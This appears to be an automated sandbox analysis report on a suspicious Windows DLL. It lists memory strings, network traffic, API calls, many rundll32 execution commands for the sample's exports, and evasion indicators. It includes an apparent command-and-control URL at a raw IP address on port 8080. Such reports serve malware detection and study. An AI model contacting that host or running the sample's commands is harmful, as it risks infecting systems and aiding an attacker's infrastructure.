Source: rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf75
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=71f3cbf7date?id=36ebb732
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032BA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9
Source: rundll32.exe, 0000001E.00000002.3964912413.0000000003362000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3942314601.0000000003362000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9aa
Source: rundll32.exe, 0000001E.00000003.3548312483.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3776753542.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548563603.0000000003357000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000003.3548865811.0000000003357000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9date?id=36ebb732Q
Source: rundll32.exe, 0000001E.00000002.3964912413.00000000032F5000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://52.90.110.169:8080/update?id=dc53bbb9r
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD51880 EntryPoint,ExitWindowsEx
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD51880 EntryPoint,ExitWindowsEx
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD5E040
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD5E2F0
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD5E308
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD5E32D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD5E040
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD5E2F0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD5E308
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD5E32D
Source: LisectAVT_2403002B_14.dll | Binary or memory string: OriginalFilenameSafeSvc.exe0 vs LisectAVT_2403002B_14.dll
Source: LisectAVT_2403002B_14.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine | Classification label: mal56.evad.winDLL@93/0@1/11
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD66580 AdjustTokenPrivileges
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD56690 StartServiceCtrlDispatcherW
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD56690 StartServiceCtrlDispatcherW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD56690 StartServiceCtrlDispatcherW
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1320:120:WilError_03
Source: LisectAVT_2403002B_14.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBltvkx
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LisectAVT_2403002B_14.dll,GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBltvkx
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkBmoaar
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkCyrpw
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZtdij
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkZewk
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXzwnp
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkXalbb
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWyey
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWtlrh
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWsnq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkWapq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkVnndq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkUsmc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTrg
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTjxdo
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTch
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkTcfv
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkStso
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSf
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkSbq
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkRrdcfn
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQulon
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQr
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkQm
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkPp
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOxft
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOksgc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOi
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOhqbhe
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkOda
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNsdwzc
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNr
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNofovl
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",GnrkNlqh
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\LisectAVT_2403002B_14.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: LisectAVT_2403002B_14.dll | Static PE information: Image base 0x737d0000 > 0x60000000
Source: LisectAVT_2403002B_14.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD528E0 CreateMailslotW,LoadLibraryA,GetProcAddress
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD56690 StartServiceCtrlDispatcherW
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 2710
Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 7167
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation (graph_30-20634)
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 30_2_6CD51000
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5764 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3060 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3200 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2544 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6564 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6724 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6368 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5980 | Thread sleep count: 98 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 280 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5484 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5480 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4852 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 5040 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 3472 | Thread sleep count: 99 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 4596 | Thread sleep count: 100 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 64 | Thread sleep count: 98 > 30
